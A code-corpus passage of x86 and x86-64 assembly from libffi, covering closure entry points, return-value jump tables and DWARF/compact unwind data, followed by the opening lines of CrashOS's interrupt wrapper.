   return value (extracted via X86_RET_POP_SHIFT); each load_table3
   entry therefore restores %esp from the precomputed %ecx itself.  */
.balign 16
.globl C(ffi_closure_STDCALL)
FFI_HIDDEN(C(ffi_closure_STDCALL))
C(ffi_closure_STDCALL):
L(UW27):
# cfi_startproc
subl $closure_FS, %esp
L(UW28):
# cfi_def_cfa_offset(closure_FS + 4)
FFI_CLOSURE_SAVE_REGS
/* Entry point from ffi_closure_REGISTER. */
L(do_closure_REGISTER):
FFI_CLOSURE_COPY_TRAMP_DATA
/* Entry point from preceding Go closure. */
L(do_closure_STDCALL):
FFI_CLOSURE_PREP_CALL
FFI_CLOSURE_CALL_INNER(29)
movl %eax, %ecx
shrl $X86_RET_POP_SHIFT, %ecx /* isolate pop count */
leal closure_FS(%esp, %ecx), %ecx /* compute popped esp */
movl closure_FS(%esp), %edx /* move return address */
movl %edx, (%ecx)
/* From this point on, the value of %esp upon return is %ecx+4,
and we've copied the return address to %ecx to make return easy.
There's no point in representing this in the unwind info, as
there is always a window between the mov and the ret which
will be wrong from one point of view or another. */
FFI_CLOSURE_MASK_AND_JUMP(3, 30)
/* Jump table: each entry is exactly 8 bytes (asserted by E()).  */
.balign 8
L(load_table3):
E(L(load_table3), X86_RET_FLOAT)
flds closure_CF(%esp)
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_DOUBLE)
fldl closure_CF(%esp)
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_LDOUBLE)
fldt closure_CF(%esp)
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_SINT8)
movsbl %al, %eax
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_SINT16)
movswl %ax, %eax
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_UINT8)
movzbl %al, %eax
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_UINT16)
movzwl %ax, %eax
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_INT64)
movl closure_CF+4(%esp), %edx
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_INT32)
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_VOID)
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_STRUCTPOP)
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_STRUCTARG)
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_STRUCT_1B)
movzbl %al, %eax
movl %ecx, %esp
ret
E(L(load_table3), X86_RET_STRUCT_2B)
movzwl %ax, %eax
movl %ecx, %esp
ret
/* Fill out the table so that bad values are predictable. */
E(L(load_table3), X86_RET_UNUSED14)
ud2
E(L(load_table3), X86_RET_UNUSED15)
ud2
L(UW31):
# cfi_endproc
ENDF(C(ffi_closure_STDCALL))
#if !FFI_NO_RAW_API
/* Raw SYSV closure: calls cl->fun directly with
   (cif, &res, raw_args, user_data) built on the stack, then
   dispatches on cif->flags to load the result from the 16-byte
   result slot at 16(%esp).  %ebx is preserved across the call.  */
#define raw_closure_S_FS (16+16+12)
.balign 16
.globl C(ffi_closure_raw_SYSV)
FFI_HIDDEN(C(ffi_closure_raw_SYSV))
C(ffi_closure_raw_SYSV):
L(UW32):
# cfi_startproc
subl $raw_closure_S_FS, %esp
L(UW33):
# cfi_def_cfa_offset(raw_closure_S_FS + 4)
movl %ebx, raw_closure_S_FS-4(%esp)
L(UW34):
# cfi_rel_offset(%ebx, raw_closure_S_FS-4)
movl FFI_TRAMPOLINE_SIZE+8(%eax), %edx /* load cl->user_data */
movl %edx, 12(%esp)
leal raw_closure_S_FS+4(%esp), %edx /* load raw_args */
movl %edx, 8(%esp)
leal 16(%esp), %edx /* load &res */
movl %edx, 4(%esp)
movl FFI_TRAMPOLINE_SIZE(%eax), %ebx /* load cl->cif */
movl %ebx, (%esp)
call *FFI_TRAMPOLINE_SIZE+4(%eax) /* call cl->fun */
movl 20(%ebx), %eax /* load cif->flags */
andl $X86_RET_TYPE_MASK, %eax
#ifdef __PIC__
call C(__x86.get_pc_thunk.bx)
L(pc4):
leal L(load_table4)-L(pc4)(%ebx, %eax, 8), %ecx
#else
leal L(load_table4)(,%eax, 8), %ecx
#endif
movl raw_closure_S_FS-4(%esp), %ebx
L(UW35):
# cfi_restore(%ebx)
movl 16(%esp), %eax /* Optimistic load */
jmp *%ecx
/* Jump table: each entry is exactly 8 bytes (asserted by E()).  */
.balign 8
L(load_table4):
E(L(load_table4), X86_RET_FLOAT)
flds 16(%esp)
jmp L(e4)
E(L(load_table4), X86_RET_DOUBLE)
fldl 16(%esp)
jmp L(e4)
E(L(load_table4), X86_RET_LDOUBLE)
fldt 16(%esp)
jmp L(e4)
E(L(load_table4), X86_RET_SINT8)
movsbl %al, %eax
jmp L(e4)
E(L(load_table4), X86_RET_SINT16)
movswl %ax, %eax
jmp L(e4)
E(L(load_table4), X86_RET_UINT8)
movzbl %al, %eax
jmp L(e4)
E(L(load_table4), X86_RET_UINT16)
movzwl %ax, %eax
jmp L(e4)
E(L(load_table4), X86_RET_INT64)
movl 16+4(%esp), %edx
jmp L(e4)
E(L(load_table4), X86_RET_INT32)
nop
/* fallthru */
E(L(load_table4), X86_RET_VOID)
L(e4):
addl $raw_closure_S_FS, %esp
L(UW36):
# cfi_adjust_cfa_offset(-raw_closure_S_FS)
ret
L(UW37):
# cfi_adjust_cfa_offset(raw_closure_S_FS)
E(L(load_table4), X86_RET_STRUCTPOP)
addl $raw_closure_S_FS, %esp
L(UW38):
# cfi_adjust_cfa_offset(-raw_closure_S_FS)
ret $4
L(UW39):
# cfi_adjust_cfa_offset(raw_closure_S_FS)
E(L(load_table4), X86_RET_STRUCTARG)
jmp L(e4)
E(L(load_table4), X86_RET_STRUCT_1B)
movzbl %al, %eax
jmp L(e4)
E(L(load_table4), X86_RET_STRUCT_2B)
movzwl %ax, %eax
jmp L(e4)
/* Fill out the table so that bad values are predictable. */
E(L(load_table4), X86_RET_UNUSED14)
ud2
E(L(load_table4), X86_RET_UNUSED15)
ud2
L(UW40):
# cfi_endproc
ENDF(C(ffi_closure_raw_SYSV))
/* Raw THISCALL closure: identical to the raw SYSV variant, except the
   `this' pointer arrives in %ecx and must be re-pushed as the first
   stack argument (hence the return-address shuffle below, and the
   extra 4 bytes popped on return).  */
#define raw_closure_T_FS (16+16+8)
.balign 16
.globl C(ffi_closure_raw_THISCALL)
FFI_HIDDEN(C(ffi_closure_raw_THISCALL))
C(ffi_closure_raw_THISCALL):
L(UW41):
# cfi_startproc
/* Rearrange the stack such that %ecx is the first argument.
This means moving the return address. */
popl %edx
L(UW42):
# cfi_def_cfa_offset(0)
# cfi_register(%eip, %edx)
pushl %ecx
L(UW43):
# cfi_adjust_cfa_offset(4)
pushl %edx
L(UW44):
# cfi_adjust_cfa_offset(4)
# cfi_rel_offset(%eip, 0)
subl $raw_closure_T_FS, %esp
L(UW45):
# cfi_adjust_cfa_offset(raw_closure_T_FS)
movl %ebx, raw_closure_T_FS-4(%esp)
L(UW46):
# cfi_rel_offset(%ebx, raw_closure_T_FS-4)
movl FFI_TRAMPOLINE_SIZE+8(%eax), %edx /* load cl->user_data */
movl %edx, 12(%esp)
leal raw_closure_T_FS+4(%esp), %edx /* load raw_args */
movl %edx, 8(%esp)
leal 16(%esp), %edx /* load &res */
movl %edx, 4(%esp)
movl FFI_TRAMPOLINE_SIZE(%eax), %ebx /* load cl->cif */
movl %ebx, (%esp)
call *FFI_TRAMPOLINE_SIZE+4(%eax) /* call cl->fun */
movl 20(%ebx), %eax /* load cif->flags */
andl $X86_RET_TYPE_MASK, %eax
#ifdef __PIC__
call C(__x86.get_pc_thunk.bx)
L(pc5):
leal L(load_table5)-L(pc5)(%ebx, %eax, 8), %ecx
#else
leal L(load_table5)(,%eax, 8), %ecx
#endif
movl raw_closure_T_FS-4(%esp), %ebx
L(UW47):
# cfi_restore(%ebx)
movl 16(%esp), %eax /* Optimistic load */
jmp *%ecx
/* Jump table: each entry is exactly 8 bytes (asserted by E()).  */
.balign 8
L(load_table5):
E(L(load_table5), X86_RET_FLOAT)
flds 16(%esp)
jmp L(e5)
E(L(load_table5), X86_RET_DOUBLE)
fldl 16(%esp)
jmp L(e5)
E(L(load_table5), X86_RET_LDOUBLE)
fldt 16(%esp)
jmp L(e5)
E(L(load_table5), X86_RET_SINT8)
movsbl %al, %eax
jmp L(e5)
E(L(load_table5), X86_RET_SINT16)
movswl %ax, %eax
jmp L(e5)
E(L(load_table5), X86_RET_UINT8)
movzbl %al, %eax
jmp L(e5)
E(L(load_table5), X86_RET_UINT16)
movzwl %ax, %eax
jmp L(e5)
E(L(load_table5), X86_RET_INT64)
movl 16+4(%esp), %edx
jmp L(e5)
E(L(load_table5), X86_RET_INT32)
nop
/* fallthru */
E(L(load_table5), X86_RET_VOID)
L(e5):
addl $raw_closure_T_FS, %esp
L(UW48):
# cfi_adjust_cfa_offset(-raw_closure_T_FS)
/* Remove the extra %ecx argument we pushed. */
ret $4
L(UW49):
# cfi_adjust_cfa_offset(raw_closure_T_FS)
E(L(load_table5), X86_RET_STRUCTPOP)
addl $raw_closure_T_FS, %esp
L(UW50):
# cfi_adjust_cfa_offset(-raw_closure_T_FS)
ret $8
L(UW51):
# cfi_adjust_cfa_offset(raw_closure_T_FS)
E(L(load_table5), X86_RET_STRUCTARG)
jmp L(e5)
E(L(load_table5), X86_RET_STRUCT_1B)
movzbl %al, %eax
jmp L(e5)
E(L(load_table5), X86_RET_STRUCT_2B)
movzwl %ax, %eax
jmp L(e5)
/* Fill out the table so that bad values are predictable. */
E(L(load_table5), X86_RET_UNUSED14)
ud2
E(L(load_table5), X86_RET_UNUSED15)
ud2
L(UW52):
# cfi_endproc
ENDF(C(ffi_closure_raw_THISCALL))
#endif /* !FFI_NO_RAW_API */
/* COMDAT(X): emit X in a linkonce/comdat section so multiple objects
   defining the same thunk are merged by the linker.  */
#ifdef X86_DARWIN
# define COMDAT(X) \
.section __TEXT,__text,coalesced,pure_instructions; \
.weak_definition X; \
FFI_HIDDEN(X)
#elif defined __ELF__ && !(defined(__sun__) && defined(__svr4__))
# define COMDAT(X) \
.section .text.X,"axG",@progbits,X,comdat; \
.globl X; \
FFI_HIDDEN(X)
#else
# define COMDAT(X)
#endif
#if defined(__PIC__)
/* Return the caller's address (the value at the top of the stack)
   in %ebx / %edx; used to materialize a PC for PIC addressing.  */
COMDAT(C(__x86.get_pc_thunk.bx))
C(__x86.get_pc_thunk.bx):
movl (%esp), %ebx
ret
ENDF(C(__x86.get_pc_thunk.bx))
# if defined X86_DARWIN || defined HAVE_HIDDEN_VISIBILITY_ATTRIBUTE
COMDAT(C(__x86.get_pc_thunk.dx))
C(__x86.get_pc_thunk.dx):
movl (%esp), %edx
ret
ENDF(C(__x86.get_pc_thunk.dx))
#endif /* DARWIN || HIDDEN */
#endif /* __PIC__ */
/* Hand-written DWARF .eh_frame data mirroring the cfi_* annotations in
   the code above (needed where the assembler lacks .cfi support).
   One CIE is shared by all FDEs; each FDE covers one entry point,
   bounded by the L(UWn) labels.  Keep these tables in sync with any
   change to the code's stack adjustments.  */
/* Sadly, OSX cctools-as doesn't understand .cfi directives at all. */
#ifdef __APPLE__
.section __TEXT,__eh_frame,coalesced,no_toc+strip_static_syms+live_support
EHFrame0:
#elif defined(X86_WIN32)
.section .eh_frame,"r"
#elif defined(HAVE_AS_X86_64_UNWIND_SECTION_TYPE)
.section .eh_frame,EH_FRAME_FLAGS,@unwind
#else
.section .eh_frame,EH_FRAME_FLAGS,@progbits
#endif
#ifdef HAVE_AS_X86_PCREL
# define PCREL(X) X - .
#else
# define PCREL(X) X@rel
#endif
/* Simplify advancing between labels. Assume DW_CFA_advance_loc1 fits. */
#define ADV(N, P) .byte 2, L(N)-L(P)
.balign 4
L(CIE):
.set L(set0),L(ECIE)-L(SCIE)
.long L(set0) /* CIE Length */
L(SCIE):
.long 0 /* CIE Identifier Tag */
.byte 1 /* CIE Version */
.ascii "zR\0" /* CIE Augmentation */
.byte 1 /* CIE Code Alignment Factor */
.byte 0x7c /* CIE Data Alignment Factor */
.byte 0x8 /* CIE RA Column */
.byte 1 /* Augmentation size */
.byte 0x1b /* FDE Encoding (pcrel sdata4) */
.byte 0xc, 4, 4 /* DW_CFA_def_cfa, %esp offset 4 */
.byte 0x80+8, 1 /* DW_CFA_offset, %eip offset 1*-4 */
.balign 4
L(ECIE):
/* FDE 1: ffi_call_i386 (UW0..UW5).  */
.set L(set1),L(EFDE1)-L(SFDE1)
.long L(set1) /* FDE Length */
L(SFDE1):
.long L(SFDE1)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW0)) /* Initial location */
.long L(UW5)-L(UW0) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW1, UW0)
.byte 0xc, 5, 8 /* DW_CFA_def_cfa, %ebp 8 */
.byte 0x80+5, 2 /* DW_CFA_offset, %ebp 2*-4 */
ADV(UW2, UW1)
.byte 0x80+3, 0 /* DW_CFA_offset, %ebx 0*-4 */
ADV(UW3, UW2)
.byte 0xa /* DW_CFA_remember_state */
.byte 0xc, 4, 4 /* DW_CFA_def_cfa, %esp 4 */
.byte 0xc0+3 /* DW_CFA_restore, %ebx */
.byte 0xc0+5 /* DW_CFA_restore, %ebp */
ADV(UW4, UW3)
.byte 0xb /* DW_CFA_restore_state */
.balign 4
L(EFDE1):
/* FDE 2: ffi_go_closure_EAX (UW6..UW8).  */
.set L(set2),L(EFDE2)-L(SFDE2)
.long L(set2) /* FDE Length */
L(SFDE2):
.long L(SFDE2)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW6)) /* Initial location */
.long L(UW8)-L(UW6) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW7, UW6)
.byte 0xe, closure_FS+4 /* DW_CFA_def_cfa_offset */
.balign 4
L(EFDE2):
/* FDE 3: ffi_go_closure_ECX (UW9..UW11).  */
.set L(set3),L(EFDE3)-L(SFDE3)
.long L(set3) /* FDE Length */
L(SFDE3):
.long L(SFDE3)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW9)) /* Initial location */
.long L(UW11)-L(UW9) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW10, UW9)
.byte 0xe, closure_FS+4 /* DW_CFA_def_cfa_offset */
.balign 4
L(EFDE3):
/* FDE 4: ffi_closure_i386 (UW12..UW20).  */
.set L(set4),L(EFDE4)-L(SFDE4)
.long L(set4) /* FDE Length */
L(SFDE4):
.long L(SFDE4)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW12)) /* Initial location */
.long L(UW20)-L(UW12) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW13, UW12)
.byte 0xe, closure_FS+4 /* DW_CFA_def_cfa_offset */
#ifdef FFI_CLOSURE_CALL_INNER_SAVE_EBX
ADV(UW14, UW13)
.byte 0x80+3, (40-(closure_FS+4))/-4 /* DW_CFA_offset %ebx */
ADV(UW15, UW14)
.byte 0xc0+3 /* DW_CFA_restore %ebx */
ADV(UW16, UW15)
#else
ADV(UW16, UW13)
#endif
.byte 0xe, 4 /* DW_CFA_def_cfa_offset */
ADV(UW17, UW16)
.byte 0xe, closure_FS+4 /* DW_CFA_def_cfa_offset */
ADV(UW18, UW17)
.byte 0xe, 4 /* DW_CFA_def_cfa_offset */
ADV(UW19, UW18)
.byte 0xe, closure_FS+4 /* DW_CFA_def_cfa_offset */
.balign 4
L(EFDE4):
/* FDE 5: ffi_go_closure_STDCALL (UW21..UW23).  */
.set L(set5),L(EFDE5)-L(SFDE5)
.long L(set5) /* FDE Length */
L(SFDE5):
.long L(SFDE5)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW21)) /* Initial location */
.long L(UW23)-L(UW21) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW22, UW21)
.byte 0xe, closure_FS+4 /* DW_CFA_def_cfa_offset */
.balign 4
L(EFDE5):
/* FDE 6: ffi_closure_REGISTER (UW24..UW26).  */
.set L(set6),L(EFDE6)-L(SFDE6)
.long L(set6) /* FDE Length */
L(SFDE6):
.long L(SFDE6)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW24)) /* Initial location */
.long L(UW26)-L(UW24) /* Address range */
.byte 0 /* Augmentation size */
.byte 0xe, 8 /* DW_CFA_def_cfa_offset */
.byte 0x80+8, 2 /* DW_CFA_offset %eip, 2*-4 */
ADV(UW25, UW24)
.byte 0xe, closure_FS+4 /* DW_CFA_def_cfa_offset */
.balign 4
L(EFDE6):
/* FDE 7: ffi_closure_STDCALL (UW27..UW31).  */
.set L(set7),L(EFDE7)-L(SFDE7)
.long L(set7) /* FDE Length */
L(SFDE7):
.long L(SFDE7)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW27)) /* Initial location */
.long L(UW31)-L(UW27) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW28, UW27)
.byte 0xe, closure_FS+4 /* DW_CFA_def_cfa_offset */
#ifdef FFI_CLOSURE_CALL_INNER_SAVE_EBX
ADV(UW29, UW28)
.byte 0x80+3, (40-(closure_FS+4))/-4 /* DW_CFA_offset %ebx */
ADV(UW30, UW29)
.byte 0xc0+3 /* DW_CFA_restore %ebx */
#endif
.balign 4
L(EFDE7):
#if !FFI_NO_RAW_API
/* FDE 8: ffi_closure_raw_SYSV (UW32..UW40).  */
.set L(set8),L(EFDE8)-L(SFDE8)
.long L(set8) /* FDE Length */
L(SFDE8):
.long L(SFDE8)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW32)) /* Initial location */
.long L(UW40)-L(UW32) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW33, UW32)
.byte 0xe, raw_closure_S_FS+4 /* DW_CFA_def_cfa_offset */
ADV(UW34, UW33)
.byte 0x80+3, 2 /* DW_CFA_offset %ebx 2*-4 */
ADV(UW35, UW34)
.byte 0xc0+3 /* DW_CFA_restore %ebx */
ADV(UW36, UW35)
.byte 0xe, 4 /* DW_CFA_def_cfa_offset */
ADV(UW37, UW36)
.byte 0xe, raw_closure_S_FS+4 /* DW_CFA_def_cfa_offset */
ADV(UW38, UW37)
.byte 0xe, 4 /* DW_CFA_def_cfa_offset */
ADV(UW39, UW38)
.byte 0xe, raw_closure_S_FS+4 /* DW_CFA_def_cfa_offset */
.balign 4
L(EFDE8):
/* FDE 9: ffi_closure_raw_THISCALL (UW41..UW52).  */
.set L(set9),L(EFDE9)-L(SFDE9)
.long L(set9) /* FDE Length */
L(SFDE9):
.long L(SFDE9)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW41)) /* Initial location */
.long L(UW52)-L(UW41) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW42, UW41)
.byte 0xe, 0 /* DW_CFA_def_cfa_offset */
.byte 0x9, 8, 2 /* DW_CFA_register %eip, %edx */
ADV(UW43, UW42)
.byte 0xe, 4 /* DW_CFA_def_cfa_offset */
ADV(UW44, UW43)
.byte 0xe, 8 /* DW_CFA_def_cfa_offset */
.byte 0x80+8, 2 /* DW_CFA_offset %eip 2*-4 */
ADV(UW45, UW44)
.byte 0xe, raw_closure_T_FS+8 /* DW_CFA_def_cfa_offset */
ADV(UW46, UW45)
.byte 0x80+3, 3 /* DW_CFA_offset %ebx 3*-4 */
ADV(UW47, UW46)
.byte 0xc0+3 /* DW_CFA_restore %ebx */
ADV(UW48, UW47)
.byte 0xe, 8 /* DW_CFA_def_cfa_offset */
ADV(UW49, UW48)
.byte 0xe, raw_closure_T_FS+8 /* DW_CFA_def_cfa_offset */
ADV(UW50, UW49)
.byte 0xe, 8 /* DW_CFA_def_cfa_offset */
ADV(UW51, UW50)
.byte 0xe, raw_closure_T_FS+8 /* DW_CFA_def_cfa_offset */
.balign 4
L(EFDE9):
#endif /* !FFI_NO_RAW_API */
#ifdef _WIN32
/* Emit the @feat.00 marker symbol expected by MS linkers.  */
.def @feat.00;
.scl 3;
.type 0;
.endef
.globl @feat.00
@feat.00 = 1
#endif
#ifdef __APPLE__
.subsections_via_symbols
.section __LD,__compact_unwind,regular,debug
/* Mach-O compact-unwind entries: one record per entry point, each
   deferring to the DWARF info emitted above (mode 0x04000000).
   Record layout: function start, length, encoding, personality, LSDA.  */
/* compact unwind for ffi_call_i386 */
.long C(ffi_call_i386)
.set L1,L(UW5)-L(UW0)
.long L1
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
/* compact unwind for ffi_go_closure_EAX */
.long C(ffi_go_closure_EAX)
.set L2,L(UW8)-L(UW6)
.long L2
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
/* compact unwind for ffi_go_closure_ECX */
.long C(ffi_go_closure_ECX)
.set L3,L(UW11)-L(UW9)
.long L3
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
/* compact unwind for ffi_closure_i386 */
.long C(ffi_closure_i386)
.set L4,L(UW20)-L(UW12)
.long L4
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
/* compact unwind for ffi_go_closure_STDCALL */
.long C(ffi_go_closure_STDCALL)
.set L5,L(UW23)-L(UW21)
.long L5
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
/* compact unwind for ffi_closure_REGISTER */
.long C(ffi_closure_REGISTER)
.set L6,L(UW26)-L(UW24)
.long L6
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
/* compact unwind for ffi_closure_STDCALL */
.long C(ffi_closure_STDCALL)
.set L7,L(UW31)-L(UW27)
.long L7
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
/* compact unwind for ffi_closure_raw_SYSV */
.long C(ffi_closure_raw_SYSV)
.set L8,L(UW40)-L(UW32)
.long L8
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
/* compact unwind for ffi_closure_raw_THISCALL */
.long C(ffi_closure_raw_THISCALL)
.set L9,L(UW52)-L(UW41)
.long L9
.long 0x04000000 /* use dwarf unwind info */
.long 0
.long 0
#endif /* __APPLE__ */
#endif /* ifndef _MSC_VER */
#endif /* ifndef __x86_64__ */
#if defined __ELF__ && defined __linux__
/* Mark the stack non-executable on GNU/Linux.  */
.section .note.GNU-stack,"",@progbits
#endif
#endif
|
aimardcr/APKKiller
| 5,142
|
app/src/main/cpp/whale/src/libffi/x86/win64_x86_64.S
|
#ifdef __x86_64__
#define LIBFFI_ASM
#include <fficonfig.h>
#include <ffi.h>
#include <ffi_cfi.h>
#include "asmnames.h"
#if defined(HAVE_AS_CFI_PSEUDO_OP)
.cfi_sections .debug_frame
#endif
/* Abstract over the two 64-bit conventions this file can be built for:
   SEH(...) expands only on Windows (for .seh_* directives), and
   arg0..arg3 name the first four integer argument registers of the
   active ABI (Win64: rcx/rdx/r8/r9; SysV: rdi/rsi/rdx/rcx).  */
#ifdef X86_WIN64
#define SEH(...) __VA_ARGS__
#define arg0 %rcx
#define arg1 %rdx
#define arg2 %r8
#define arg3 %r9
#else
#define SEH(...)
#define arg0 %rdi
#define arg1 %rsi
#define arg2 %rdx
#define arg3 %rcx
#endif
/* This macro allows the safe creation of jump tables without an
actual table. The entry points into the table are all 8 bytes.
The use of ORG asserts that we're at the correct location. */
/* ??? The clang assembler doesn't handle .org with symbolic expressions. */
#if defined(__clang__) || defined(__APPLE__) || (defined (__sun__) && defined(__svr4__))
# define E(BASE, X) .balign 8
#else
# define E(BASE, X) .balign 8; .org BASE + X * 8
#endif
.text
/* ffi_call_win64 (void *stack, struct win64_call_frame *frame, void *r10)
Bit o trickiness here -- FRAME is the base of the stack frame
for this function. This has been allocated by ffi_call. We also
deallocate some of the stack that has been alloca'd. */
/* After the call, the FFI_TYPE_* code in frame+24 indexes the jump
   table at 0: below, which stores the return value (from %rax or
   %xmm0) through the result pointer in frame+32.  */
.align 8
.globl C(ffi_call_win64)
SEH(.seh_proc ffi_call_win64)
C(ffi_call_win64):
cfi_startproc
/* Set up the local stack frame and install it in rbp/rsp. */
movq (%rsp), %rax
movq %rbp, (arg1)
movq %rax, 8(arg1)
movq arg1, %rbp
cfi_def_cfa(%rbp, 16)
cfi_rel_offset(%rbp, 0)
SEH(.seh_pushreg %rbp)
SEH(.seh_setframe %rbp, 0)
SEH(.seh_endprologue)
movq arg0, %rsp
movq arg2, %r10
/* Load all slots into both general and xmm registers.
   Win64 argument slots are positional, so every slot is mirrored
   into both the integer and the sse register for that position. */
movq (%rsp), %rcx
movsd (%rsp), %xmm0
movq 8(%rsp), %rdx
movsd 8(%rsp), %xmm1
movq 16(%rsp), %r8
movsd 16(%rsp), %xmm2
movq 24(%rsp), %r9
movsd 24(%rsp), %xmm3
call *16(%rbp)
movl 24(%rbp), %ecx /* load return-type code */
movq 32(%rbp), %r8 /* load result address */
leaq 0f(%rip), %r10
cmpl $FFI_TYPE_SMALL_STRUCT_4B, %ecx
leaq (%r10, %rcx, 8), %r10
ja 99f /* out-of-range type code -> abort */
jmp *%r10
/* Below, we're space constrained most of the time. Thus we eschew the
modern "mov, pop, ret" sequence (5 bytes) for "leave, ret" (2 bytes). */
.macro epilogue
leaveq
cfi_remember_state
cfi_def_cfa(%rsp, 8)
cfi_restore(%rbp)
ret
cfi_restore_state
.endm
/* Jump table: each entry is exactly 8 bytes (asserted by E()).  */
.align 8
0:
E(0b, FFI_TYPE_VOID)
epilogue
E(0b, FFI_TYPE_INT)
movslq %eax, %rax
movq %rax, (%r8)
epilogue
E(0b, FFI_TYPE_FLOAT)
movss %xmm0, (%r8)
epilogue
E(0b, FFI_TYPE_DOUBLE)
movsd %xmm0, (%r8)
epilogue
E(0b, FFI_TYPE_LONGDOUBLE)
call PLT(C(abort))
E(0b, FFI_TYPE_UINT8)
movzbl %al, %eax
movq %rax, (%r8)
epilogue
E(0b, FFI_TYPE_SINT8)
movsbq %al, %rax
jmp 98f
E(0b, FFI_TYPE_UINT16)
movzwl %ax, %eax
movq %rax, (%r8)
epilogue
E(0b, FFI_TYPE_SINT16)
movswq %ax, %rax
jmp 98f
E(0b, FFI_TYPE_UINT32)
movl %eax, %eax
movq %rax, (%r8)
epilogue
E(0b, FFI_TYPE_SINT32)
movslq %eax, %rax
movq %rax, (%r8)
epilogue
E(0b, FFI_TYPE_UINT64)
98: movq %rax, (%r8)
epilogue
E(0b, FFI_TYPE_SINT64)
movq %rax, (%r8)
epilogue
E(0b, FFI_TYPE_STRUCT)
epilogue
E(0b, FFI_TYPE_POINTER)
movq %rax, (%r8)
epilogue
E(0b, FFI_TYPE_COMPLEX)
call PLT(C(abort))
E(0b, FFI_TYPE_SMALL_STRUCT_1B)
movb %al, (%r8)
epilogue
E(0b, FFI_TYPE_SMALL_STRUCT_2B)
movw %ax, (%r8)
epilogue
E(0b, FFI_TYPE_SMALL_STRUCT_4B)
movl %eax, (%r8)
epilogue
.align 8
99: call PLT(C(abort))
epilogue
cfi_endproc
SEH(.seh_endproc)
/* 32 bytes of outgoing register stack space, 8 bytes of alignment,
16 bytes of result, 32 bytes of xmm registers. */
#define ffi_clo_FS (32+8+16+32)
#define ffi_clo_OFF_R (32+8) /* offset of the result slot */
#define ffi_clo_OFF_X (32+8+16) /* offset of the saved xmm args */
/* Go-closure entry: closure descriptor arrives in %r10.  Loads
   cif/fun from it, passes the closure itself as user_data, and joins
   the common closure path at label 0 in ffi_closure_win64.  */
.align 8
.globl C(ffi_go_closure_win64)
SEH(.seh_proc ffi_go_closure_win64)
C(ffi_go_closure_win64):
cfi_startproc
/* Save all integer arguments into the incoming reg stack space. */
movq %rcx, 8(%rsp)
movq %rdx, 16(%rsp)
movq %r8, 24(%rsp)
movq %r9, 32(%rsp)
movq 8(%r10), %rcx /* load cif */
movq 16(%r10), %rdx /* load fun */
movq %r10, %r8 /* closure is user_data */
jmp 0f
cfi_endproc
SEH(.seh_endproc)
/* Standard closure entry: ffi_closure address arrives in %r10 (set by
   the trampoline).  Spills register args, calls
   ffi_closure_win64_inner(cif, fun, user_data, &result), then loads
   the result into both possible return registers.  */
.align 8
.globl C(ffi_closure_win64)
SEH(.seh_proc ffi_closure_win64)
C(ffi_closure_win64):
cfi_startproc
/* Save all integer arguments into the incoming reg stack space. */
movq %rcx, 8(%rsp)
movq %rdx, 16(%rsp)
movq %r8, 24(%rsp)
movq %r9, 32(%rsp)
movq FFI_TRAMPOLINE_SIZE(%r10), %rcx /* load cif */
movq FFI_TRAMPOLINE_SIZE+8(%r10), %rdx /* load fun */
movq FFI_TRAMPOLINE_SIZE+16(%r10), %r8 /* load user_data */
0:
subq $ffi_clo_FS, %rsp
cfi_adjust_cfa_offset(ffi_clo_FS)
SEH(.seh_stackalloc ffi_clo_FS)
SEH(.seh_endprologue)
/* Save all sse arguments into the stack frame. */
movsd %xmm0, ffi_clo_OFF_X(%rsp)
movsd %xmm1, ffi_clo_OFF_X+8(%rsp)
movsd %xmm2, ffi_clo_OFF_X+16(%rsp)
movsd %xmm3, ffi_clo_OFF_X+24(%rsp)
leaq ffi_clo_OFF_R(%rsp), %r9 /* 4th arg: result pointer */
call PLT(C(ffi_closure_win64_inner))
/* Load the result into both possible result registers. */
movq ffi_clo_OFF_R(%rsp), %rax
movsd ffi_clo_OFF_R(%rsp), %xmm0
addq $ffi_clo_FS, %rsp
cfi_adjust_cfa_offset(-ffi_clo_FS)
ret
cfi_endproc
SEH(.seh_endproc)
#if defined __ELF__ && defined __linux__
/* Mark the stack non-executable on GNU/Linux.  */
.section .note.GNU-stack,"",@progbits
#endif
#endif
|
airbus-seclab/crashos
| 2,812
|
src/core/interrupt_wrapper.s
|
# This file is part of CrashOS and is released under GPLv2 (see crashos/LICENSE.md)
# Copyright Airbus Group
.file "interrupt_wrapper.s"
/* Code section */
.text
.globl idt_switch
.type idt_switch,"function"
/* Array defined and initialized in interrupt_handler.c/init_handler_array() */
.extern interrupt_handlers
/* Common interrupt/exception dispatcher.
   Entered from an idt_switch stub with the stack holding:
     [esp]   vector number (pushed by the stub)
